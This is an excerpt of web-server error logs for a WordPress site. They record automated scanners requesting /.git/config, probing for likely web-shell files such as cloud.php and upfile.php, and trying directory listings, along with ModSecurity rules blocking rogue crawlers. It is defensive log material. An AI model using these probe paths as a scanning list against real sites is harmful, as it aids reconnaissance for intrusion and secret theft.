"OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu.com/wp-content/plugins/pirate-forms/public/js/custom-spam.js"] [unique_id "Z2YsDz9hyM6cnuEe5TQCzwAAAJQ"] [Fri Dec 20 21:46:42.517086 2024] [:error] [pid 14985:tid 140515324442368] [client 54.169.156.171:47214] [client 54.169.156.171] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "EmailWolf"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu.com/wp-content/themes/zerif-lite/js/bootstrap.min.js"] [unique_id "Z2YsEj9hyM6cnuEe5TQC0wAAAIY"] [Sat Dec 21 08:31:06.058649 2024] [:error] [pid 4888:tid 140273975789312] [client 150.136.222.122:45754] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sat Dec 21 08:31:18.901094 2024] [:error] [pid 4789:tid 140273883469568] [client 150.136.222.122:45794] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Dec 21 08:31:18.910678 2024] [:error] [pid 4788:tid 140274034538240] [client 150.136.222.122:45796] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Dec 21 08:31:57.992113 2024] [autoindex:error] [pid 4790:tid 140273883469568] [client 150.136.222.122:45912] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Dec 21 08:32:07.216919 2024] [:error] [pid 4788:tid 140273933825792] [client 150.136.222.122:45936] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Dec 21 08:32:08.222807 2024] [autoindex:error] [pid 4788:tid 140273975789312] [client 150.136.222.122:45940] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Dec 21 08:32:09.150477 2024] [autoindex:error] [pid 4788:tid 140274116966144] [client 150.136.222.122:45944] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Dec 21 08:32:14.353740 2024] [:error] [pid 4790:tid 140274034538240] [client 150.136.222.122:45958] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Dec 21 08:32:14.362650 2024] [:error] [pid 4790:tid 140273992574720] [client 150.136.222.122:45960] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Dec 21 08:33:00.875227 2024] [:error] [pid 4888:tid 140274017752832] [client 150.136.222.122:46080] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sat Dec 21 08:33:14.401637 2024] [:error] [pid 4888:tid 140273883469568] [client 150.136.222.122:46112] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Dec 21 08:33:14.410763 2024] [:error] [pid 4789:tid 140273841506048] [client 150.136.222.122:46114] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Dec 21 08:33:53.173093 2024] [autoindex:error] [pid 4789:tid 140273959003904] [client 150.136.222.122:46210] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Dec 21 08:34:02.074508 2024] [:error] [pid 4789:tid 140273891862272] [client 150.136.222.122:46232] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Dec 21 08:34:03.158272 2024] [autoindex:error] [pid 4888:tid 140273933825792] [client 150.136.222.122:46236] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Dec 21 08:34:04.071241 2024] [autoindex:error] [pid 4789:tid 140273849898752] [client 150.136.222.122:46240] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Dec 21 08:34:09.654715 2024] [:error] [pid 4888:tid 140273858291456] [client 150.136.222.122:46254] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Dec 21 08:34:09.663957 2024] [:error] [pid 4788:tid 140273866684160] [client 150.136.222.122:46256] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php 2024/12/21 17:28:03 [error] 4623#4623: *6171 access forbidden by rule, client: 54.234.30.149, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/12/21 18:29:53 [error] 4623#4623: *6435 access forbidden by rule, client: 54.234.30.149, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/12/21 19:23:47 [error] 32008#32008: *25 access forbidden by rule, client: 54.234.30.149, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/21 19:38:12 [error] 32007#32007: *72 access forbidden by rule, client: 54.234.30.149, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/12/22 10:22:17 [error] 11993#11993: *7749 access forbidden by rule, client: 103.102.230.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/22 12:56:00 [error] 11995#11995: *8743 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/12/22 13:13:03 [error] 11995#11995: *9232 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/22 13:47:30 [error] 11993#11993: *9445 access forbidden by rule, client: 103.102.230.8, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sun Dec 22 16:26:57.611359 2024] [:error] [pid 13051:tid 140690260432640] [client 18.142.138.40:47664] [client 18.142.138.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "grub-client"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-emoji-release.min.js"] [unique_id "Z2iEIeYD-vyLTrFk0tQLGwAAAM4"] 2024/12/22 17:53:24 [error] 11995#11995: *11892 access forbidden by rule, client: 103.102.230.8, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/12/22 18:21:32 [error] 11993#11993: *12057 access forbidden by rule, client: 103.102.230.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Dec 22 19:11:13.097871 2024] [autoindex:error] [pid 12135:tid 140690218469120] [client 3.239.94.139:49378] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Sun Dec 22 21:58:23.218433 2024] [autoindex:error] [pid 13051:tid 140690335966976] [client 147.93.128.101:50896] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/12/22 23:47:05 [error] 11993#11993: *14008 access forbidden by rule, client: 103.102.230.8, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Dec 23 22:22:41.251195 2024] [authz_core:error] [pid 19477:tid 140203402409728] [client 64.225.75.246:42478] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/23 22:22:45 [error] 19197#19197: *26212 access forbidden by rule, client: 64.225.75.246, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Dec 24 01:37:20.847501 2024] [autoindex:error] [pid 19234:tid 140203621594880] [client 20.192.23.207:45072] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Dec 24 16:12:22.388219 2024] [authz_core:error] [pid 32383:tid 140593665599232] [client 206.189.233.36:56230] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/24 16:12:25 [error] 22954#22954: *33896 access forbidden by rule, client: 206.189.233.36, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Dec 24 23:23:33.555781 2024] [:error] [pid 32383:tid 140593732740864] [client 38.252.239.77:33340] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php:147 [Tue Dec 24 23:23:33.555859 2024] [:error] [pid 32383:tid 140593732740864] [client 38.252.239.77:33340] Stack trace: [Tue Dec 24 23:23:33.555874 2024] [:error] [pid 32383:tid 140593732740864] [client 38.252.239.77:33340] #0 {main} [Tue Dec 24 23:23:33.555977 2024] [:error] [pid 32383:tid 140593732740864] [client 38.252.239.77:33340] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php on line 147 [Wed Dec 25 03:09:21.796631 2024] [autoindex:error] [pid 22994:tid 140593914984192] [client 108.165.243.135:36846] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Wed Dec 25 03:09:27.430420 2024] [autoindex:error] [pid 22994:tid 140593665599232] [client 108.165.243.135:36858] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Wed Dec 25 03:09:41.930524 2024] [autoindex:error] [pid 22994:tid 140593673991936] [client 108.165.243.135:36890] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Wed Dec 25 03:09:47.971303 2024] [autoindex:error] [pid 32383:tid 140593741133568] [client 108.165.243.135:36902] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 25 03:09:49.312541 2024] [autoindex:error] [pid 23536:tid 140593707562752] [client 108.165.243.135:36906] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Wed Dec 25 03:10:05.154374 2024] [autoindex:error] [pid 32383:tid 140593682384640] [client 108.165.243.135:36938] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Wed Dec 25 03:10:05.407868 2024] [:error] [pid 32383:tid 140593732740864] [client 108.165.243.135:36940] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Wed Dec 25 03:10:07.997094 2024] [autoindex:error] [pid 23536:tid 140593690777344] [client 108.165.243.135:36946] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Wed Dec 25 03:10:10.690079 2024] [autoindex:error] [pid 22995:tid 140593690777344] [client 108.165.243.135:36952] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Wed Dec 25 03:10:26.082344 2024] [autoindex:error] [pid 32383:tid 140593715955456] [client 108.165.243.135:36980] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Wed Dec 25 03:10:33.093554 2024] [autoindex:error] [pid 23536:tid 140593665599232] [client 108.165.243.135:36994] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Wed Dec 25 03:10:36.424103 2024] [autoindex:error] [pid 22993:tid 140593799882496] [client 108.165.243.135:37002] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Wed Dec 25 03:10:41.064953 2024] [autoindex:error] [pid 23536:tid 140593673991936] [client 108.165.243.135:37012] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Wed Dec 25 03:10:42.406834 2024] [autoindex:error] [pid 23536:tid 140593923376896] [client 108.165.243.135:37016] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Wed Dec 25 03:10:44.950693 2024] [:error] [pid 23536:tid 140593889806080] [client 108.165.243.135:37022] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Dec 25 03:10:48.749516 2024] [autoindex:error] [pid 23536:tid 140593774704384] [client 108.165.243.135:37032] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Wed Dec 25 03:10:55.737869 2024] [autoindex:error] [pid 23536:tid 140593732740864] [client 108.165.243.135:37048] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Wed Dec 25 03:11:10.794380 2024] [autoindex:error] [pid 32305:tid 140593715955456] [client 108.165.243.135:37078] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 25 03:11:21.967446 2024] [autoindex:error] [pid 22995:tid 140593889806080] [client 108.165.243.135:37098] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Wed Dec 25 03:11:39.056468 2024] [:error] [pid 22993:tid 140593673991936] [client 108.165.243.135:37128] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Dec 25 03:11:40.377432 2024] [autoindex:error] [pid 23536:tid 140593724348160] [client 108.165.243.135:37132] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Wed Dec 25 03:12:00.649354 2024] [:error] [pid 22993:tid 140593749526272] [client 108.165.243.135:37174] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Dec 25 03:12:21.160590 2024] [:error] [pid 23536:tid 140593690777344] [client 108.165.243.135:37210] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Wed Dec 25 03:12:38.217884 2024] [autoindex:error] [pid 32305:tid 140593673991936] [client 108.165.243.135:37248] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Wed Dec 25 03:13:30.144951 2024] [:error] [pid 22993:tid 140593808275200] [client 108.165.243.135:37352] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php 2024/12/26 06:13:43 [error] 14628#14628: *57482 access forbidden by rule, client: 35.178.202.15, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/12/26 10:06:35 [error] 14628#14628: *59694 access forbidden by rule, client: 35.178.202.15, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/26 10:47:33 [error] 14628#14628: *60106 access forbidden by rule, client: 35.178.202.15, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Thu Dec 26 11:05:51.506794 2024] [authz_core:error] [pid 14765:tid 140083822774016] [client 64.23.218.208:43812] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/26 11:05:56 [error] 14629#14629: *60251 access forbidden by rule, client: 64.23.218.208, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/26 11:49:04 [error] 14629#14629: *60649 access forbidden by rule, client: 35.178.202.15, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Dec 26 13:26:26.333943 2024] [autoindex:error] [pid 15311:tid 140083864737536] [client 68.183.84.198:47128] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/12/26 13:49:21 [error] 14629#14629: *62197 access forbidden by rule, client: 35.178.202.15, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Thu Dec 26 16:00:15.934575 2024] [authz_core:error] [pid 15311:tid 140083889915648] [client 64.227.32.66:50132] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/26 16:00:20 [error] 14629#14629: *63393 access forbidden by rule, client: 64.227.32.66, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/12/27 00:05:32 [error] 14628#14628: *68353 access forbidden by rule, client: 35.178.202.15, server: cpanel.investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Fri Dec 27 00:45:26.972491 2024] [autoindex:error] [pid 28227:tid 140084078946048] [client 128.199.22.192:58342] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/12/27 20:01:11 [error] 25819#25819: *78999 access forbidden by rule, client: 98.80.104.243, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Dec 28 01:35:44.696154 2024] [authz_core:error] [pid 26023:tid 140705626208000] [client 206.189.19.19:52518] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/28 01:35:49 [error] 25818#25818: *83995 access forbidden by rule, client: 206.189.19.19, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Dec 28 05:33:38.659181 2024] [authz_core:error] [pid 12191:tid 140506994517760] [client 138.68.86.32:55088] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/28 05:33:43 [error] 12049#12049: *85581 access forbidden by rule, client: 138.68.86.32, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/28 13:38:56 [error] 12050#12050: *90066 access forbidden by rule, client: 34.231.71.168, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/12/28 13:47:40 [error] 12050#12050: *90139 access forbidden by rule, client: 34.231.71.168, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/12/28 22:00:16 [error] 12050#12050: *93485 access forbidden by rule, client: 34.231.71.168, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/29 00:43:56 [error] 12050#12050: *95683 access forbidden by rule, client: 96.126.110.74, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/12/29 00:43:58 [error] 12050#12050: *95837 access forbidden by rule, client: 159.65.18.197, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/12/29 00:43:59 [error] 12050#12050: *95855 access forbidden by rule, client: 139.59.132.8, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/29 00:44:02 [error] 12049#12049: *95936 access forbidden by rule, client: 164.90.208.56, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/12/29 00:44:02 [error] 12049#12049: *95942 access forbidden by rule, client: 64.225.75.246, server: 